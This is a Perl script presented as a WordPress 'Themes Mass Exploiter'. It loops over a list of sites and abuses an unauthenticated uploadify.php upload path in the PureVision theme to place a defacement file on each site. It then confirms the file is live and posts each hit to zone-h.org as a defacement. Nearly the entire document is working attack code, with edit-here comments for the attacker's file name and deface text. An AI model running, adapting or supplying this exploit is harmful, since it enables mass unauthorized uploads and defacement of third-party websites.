#!/usr/bin/perl
# Themes Mass Exploiter Wordpress & Auto Post Zone-h
# Upload File and Submit your defacements on Zone-H
# TEAM : dreadpiratesr
# https://twitter.com/blackmarketi2p
# Author : dpr
# USAGE => perl bt.pl

use HTTP::Request;
use LWP::Simple;
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;

print "\n\n===================================================\n";
print "---- Themes Mass Exploiter Wordpress & Auto Post Zone-h \n";
print "---- Coded By: dreadpiratesr \n";
print "---- dreadpiratesr[at]openmailbox.org \n";
print "---- I´M HACKER BITCH \n";
print "===================================================\n\n";
print "\n\t[+] Your list name : ";
$file=<STDIN>;
chomp($file);
open (file, "<$file") || die "\n[-] Can't open the List of site file !";
my @file = <file>;
close file;
foreach $webs (@file)
{
chomp $webs;
$site = $webs;
print  "\n\n[+] Exploiting $site\n";

$path = "/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php?folder=%2F";
$site_vul = "http://".$site."".$path;
$res = $ua->request(POST $site_vul,
Content_Type => 'form-data',
Content => [
Filedata => ["memek.txt"], #EDIT YOUR FILE NAME HERE
],
);

$url = "http://".$site."/memek.txt"; #EDIT YOUR FILE NAME HERE
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
$nullcracker = $response->content;
if ($nullcracker =~ /Hacked/){ #EDIT YOUR TEKS INCLUDING ON YOUR DEFACE PAGE
print "[+] Success => $url\n";
zonpost();
open(BEN,">>result-$site.txt");
print BEN "$url\n";
close(BEN);
}else{
print "[-] Exploiting Failed ! \n";
}
}
sub zonpost{

$defacer="I´M HACKER BITCH"; #EDIT DEFACER NAME HERE
$zn="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $url,
'hackmode' => '1',
'reason' => '1',
'submit' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "[+] Zone-H => OK\n";
}
else
{
print "[-] Zone-H => Error\n";
}

}